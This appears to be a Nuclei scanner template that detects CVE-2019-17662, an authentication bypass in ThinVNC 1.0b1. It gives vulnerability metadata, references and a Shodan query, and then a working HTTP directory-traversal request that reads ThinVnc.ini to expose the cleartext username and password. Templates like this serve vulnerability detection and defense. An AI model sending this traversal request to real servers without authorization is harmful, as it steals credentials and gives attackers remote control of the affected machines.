id: CVE-2019-17662

info:
  name: ThinVNC 1.0b1 - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the ThinVNC application.
  remediation: |
    Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms.
  reference:
    - http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html
    - https://github.com/bewest/thinvnc/issues/5
    - https://redteamzone.com/ThinVNC/
    - https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-17662
    cwe-id: CWE-22
    epss-score: 0.68973
    epss-percentile: 0.97703
    cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cybelsoft
    product: thinvnc
    shodan-query: http.favicon.hash:-1414548363
  tags: packetstorm,cve,cve2019,auth-bypass,thinvnc,intrusive,cybelsoft

http:
  - raw:
      - |
        GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "User="
          - "Password="
        condition: and

      - type: word
        part: header
        words:
          - "application/binary"

      - type: status
        status:
          - 200
# digest: 490a00463044022060ee8484080d55df3f5ada7812ffb4c78b08c400c3913dd3e3d72618a5ada2a7022018fcf5495fdae337294f9f11d4f0bc7a3735d4853558c10f484593c519e810d0:922c64590222798bb761d5b6d8e72950